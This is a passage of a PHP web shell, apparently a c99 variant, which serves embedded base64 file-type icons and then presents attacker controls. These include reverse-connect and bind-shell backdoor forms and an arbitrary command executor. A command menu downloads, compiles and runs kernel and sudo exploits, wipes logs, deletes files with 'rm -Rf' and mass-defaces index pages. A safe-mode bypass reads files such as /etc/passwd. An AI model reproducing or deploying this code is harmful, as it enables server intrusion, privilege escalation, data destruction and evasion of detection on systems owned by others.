  3313. "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
  3314. "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
  3315. "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
  3316. "RYtMAgEAOw==",
  3317. "ext_cmd"=>
  3318. "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
  3319. "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
  3320. "dmrYAMn1onq/YKpjvEgAADs=",
  3321. "ext_cpp"=>
  3322. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
  3323. "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
  3324. "Eq7YrLDE7a4SADs=",
  3325. "ext_ini"=>
  3326. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
  3327. "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
  3328. "SnEjgPVarHEHgrB43JvszsQEADs=",
  3329. "ext_diz"=>
  3330. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
  3331. "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
  3332. "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
  3333. "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
  3334. "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
  3335. "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
  3336. "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
  3337. "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
  3338. "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3339. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3340. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3341. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3342. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3343. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3344. "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
  3345. "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
  3346. "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
  3347. "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
  3348. "Ow==",
  3349. "ext_doc"=>
  3350. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
  3351. "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
  3352. "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
  3353. "ext_exe"=>
  3354. "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
  3355. "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
  3356. "xhIAOw==",
  3357. "ext_h"=>
  3358. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
  3359. "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
  3360. "Wq/NknbbSgAAOw==",
  3361. "ext_hpp"=>
  3362. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
  3363. "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
  3364. "UqUagnbLdZa+YFcCADs=",
  3365. "ext_htaccess"=>
  3366. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
  3367. "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
  3368. "AAA7",
  3369. "ext_html"=>
  3370. "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
  3371. "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
  3372. "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
  3373. "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
  3374. "ADs=",
  3375. "ext_jpg"=>
  3376. "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
  3377. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
  3378. "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
  3379. "FxEAOw==",
  3380. "ext_js"=>
  3381. "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
  3382. "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
  3383. "a00AjYYBbc/o9HjNniUAADs=",
  3384. "ext_lnk"=>
  3385. "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
  3386. "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
  3387. "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
  3388. "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
  3389. "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
  3390. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3391. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3392. "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
  3393. "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
  3394. "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
  3395. "ADs=",
  3396. "ext_log"=>
  3397. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
  3398. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
  3399. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
  3400. "ext_php"=>
  3401. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
  3402. "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
  3403. "ext_pl"=>
  3404. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  3405. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  3406. "ext_swf"=>
  3407. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  3408. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  3409. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  3410. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  3411. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  3412. "ext_tar"=>
  3413. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
  3414. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
  3415. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
  3416. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
  3417. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3418. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3419. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3420. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
  3421. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
  3422. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  3423. "u4tLAgEAOw==",
  3424. "ext_txt"=>
  3425. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  3426. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  3427. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  3428. "ext_wri"=>
  3429. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  3430. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  3431. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  3432. "ext_xml"=>
  3433. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  3434. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  3435. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  3436. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  3437. "IQA7"
  3438. );
  3439. //For simple size- and speed-optimization.
  3440. $imgequals = array(
  3441. "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  3442. "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  3443. "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  3444. "ext_html"=>array("ext_html","ext_htm"),
  3445. "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  3446. "ext_lnk"=>array("ext_lnk","ext_url"),
  3447. "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  3448. "ext_doc"=>array("ext_doc","ext_dot"),
  3449. "ext_js"=>array("ext_js","ext_vbs"),
  3450. "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  3451. "ext_wri"=>array("ext_wri","ext_rtf"),
  3452. "ext_swf"=>array("ext_swf","ext_fla"),
  3453. "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  3454. "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  3455. );
  3456. if (!$getall)
  3457. {
  3458. header("Content-type: image/gif");
  3459. header("Cache-control: public");
  3460. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  3461. header("Cache-control: max-age=".(60*60*24*7));
  3462. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  3463. foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  3464. if (empty($images[$img])) {$img = "small_unk";}
  3465. if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  3466. echo base64_decode($images[$img]);
  3467. }
  3468. else
  3469. {
  3470. foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  3471. natsort($images);
  3472. $k = array_keys($images);
  3473. echo "<center>";
  3474. foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
  3475. echo "</center>";
  3476. }
  3477. exit;
  3478. }
  3479. if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
  3480. if ($act == "backc")
  3481. {
  3482. $ip = $_SERVER["REMOTE_ADDR"];
  3483. $msg = $_POST['backcconnmsg'];
  3484. $emsg = $_POST['backcconnmsge'];
  3485. echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
  3486. echo("$msg");
  3487. echo("$emsg");
  3488. }
  3489.  
  3490. if ($act == "shbd"){
  3491. $msg = $_POST['backcconnmsg'];
  3492. $emsg = $_POST['backcconnmsge'];
  3493. echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
  3494. Bind Port: <input type='text' name='backconnectport' value='5992'>
  3495. <input type='hidden' name='use' value='shbd'>
  3496. <input type='submit' value='Install Backdoor'></form>");
  3497. echo("$msg");
  3498. echo("$emsg");
  3499. echo("</center>");
  3500. } ?>
  3501. </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
  3502. <tr><td width="100%" height="1" valign="top" colspan="2"></td></tr>
  3503. <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
  3504. <br>
  3505. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
  3506. <tr><td height="1" valign="top" colspan="2"></td></tr>
  3507. <tr>
  3508. <td width="50%" height="83" valign="top"><center>
  3509. <div align="center">Useful Commands
  3510. </div>
  3511. <form action="<?php echo $surl; ?>">
  3512. <div align="center">
  3513. <input type=hidden name=act value="cmd">
  3514. <input type=hidden name="d" value="<?php echo $dispd; ?>">
  3515. <SELECT NAME="cmd">
  3516. <OPTION VALUE="uname -a">Kernel version
  3517. <OPTION VALUE="w">Logged in users
  3518. <OPTION VALUE="lastlog">Last to connect
  3519. <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
  3520. <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
  3521. <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
  3522. <OPTION VALUE="which wget curl w3m lynx">Downloaders?
  3523. <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
  3524. <OPTION VALUE="netstat -atup | grep IST">Open ports
  3525. <OPTION VALUE="locate gcc">gcc installed?
  3526. <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
  3527. <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
  3528. <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
  3529. <OPTION VALUE="./zap2">WIPELOGS PT3
  3530. <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
  3531. <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
  3532. <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
  3533. <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
  3534. <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
  3535. <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
  3536. <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow
  3537. <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit
  3538. <OPTION VALUE="./sudosploit">Execute Sudosploit
  3539. <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c
  3540. <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c
  3541. <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c
  3542. <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner
  3543. <OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner
  3544. <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner
  3545. <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<\'\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>Hacked by <font size="2" color="white"> <b> Xe[<font size="2" color="red">RR</font>]or<font size="2" color="red">0</font> </b></font> <a href=\'http\:\/\/locus7s.com\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/locus7s.com\'>/g' index.*">index.* Mass Defacement
  3546. </SELECT>
  3547. <input type=hidden name="cmd_txt" value="1">
  3548. &nbsp;
  3549. <input type=submit name=submit value="Execute">
  3550. <br>
  3551. Warning. Kernel may be alerted using higher levels </div>
  3552. </form>
  3553. </td>
  3554. <td width="50%" height="83" valign="top"><center>
  3555. <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
  3556. <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>">
  3557. <input type="hidden" name="client" value="firefox-a">
  3558. <input type="hidden" name="rls" value="org.mozilla:en-US:official">
  3559. <input type="hidden" name="hl" value="en">
  3560. <input type="hidden" name="hs" value="b7p">
  3561. <input type=submit name="btnG" VALUE="Search">
  3562. </form></center>
  3563. </td>
  3564. </tr></TABLE><br>
  3565. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
  3566. <tr><td height="1" valign="top" colspan="2"></td></tr>
  3567. <tr>
  3568. <td width="50%" height="83" valign="top"><center>
  3569. <div align="center">Php Safe-Mode Bypass (Read Files)
  3570. </div><br>
  3571. <form action="<?php echo $surl; ?>">
  3572. <div align="center">
  3573. File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
  3574.  
  3575.  
  3576.  
  3577.  
  3578.  
  3579.  
  3580. <?
  3581.  
  3582. function rsg_read()
  3583. {
  3584. $test="";
  3585. $temp=tempnam($test, "cx");
  3586. $file=$_GET['file'];
  3587. $get=htmlspecialchars($file);
  3588. echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
  3589. if(copy("compress.zlib://".$file, $temp)){
  3590. $fichier = fopen($temp, "r");
  3591. $action = fread($fichier, filesize($temp));
  3592. fclose($fichier);
  3593. $source=htmlspecialchars($action);
  3594. echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
  3595. unlink($temp);
  3596. } else {
  3597. die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  3598. <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
  3599. access.</CENTER></FONT>");
  3600. }
  3601. echo "</div>";
  3602. }
  3603.  
  3604. if(isset($_GET['file']))
  3605. {
  3606. rsg_read();
  3607. }
  3608.  
  3609. ?>
  3610.  
  3611. <?
  3612.  
  3613. function rsg_glob()
  3614. {
  3615. $chemin=$_GET['directory'];
  3616. $files = glob("$chemin*");
  3617. echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
  3618. foreach ($files as $filename) {
  3619. echo "<pre>";
  3620. echo "$filename\n";
  3621. echo "</pre>";
  3622. }
  3623. }
  3624.  
  3625. if(isset($_GET['directory']))
  3626. {
  3627. rsg_glob();
  3628. }
  3629.  
  3630. ?>
  3631.  
  3632. <br>
  3633. </div>
  3634. </form>
  3635. </td>
  3636. <td width="50%" height="83" valign="top"><center>
  3637. <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>">
  3638. <div align="center"><br>
  3639. Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
  3640.  
  3641. </form></center>
  3642. </td>
  3643. </tr></TABLE>
  3644.  
  3645.  
  3646.  
  3647.  
  3648.  
  3649.  
  3650.  
  3651.  
  3652.  
  3653.  
  3654.  
  3655.  
  3656.  
  3657.  
  3658.  
  3659.  
  3660.  
  3661.  
  3662.  
  3663.  
  3664.  
  3665.  
  3666.  
  3667.  
  3668.  
  3669.  
  3670. <br>
  3671. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
  3672. <tr>
  3673. <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
  3674. <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
  3675. </tr>
  3676. </table>
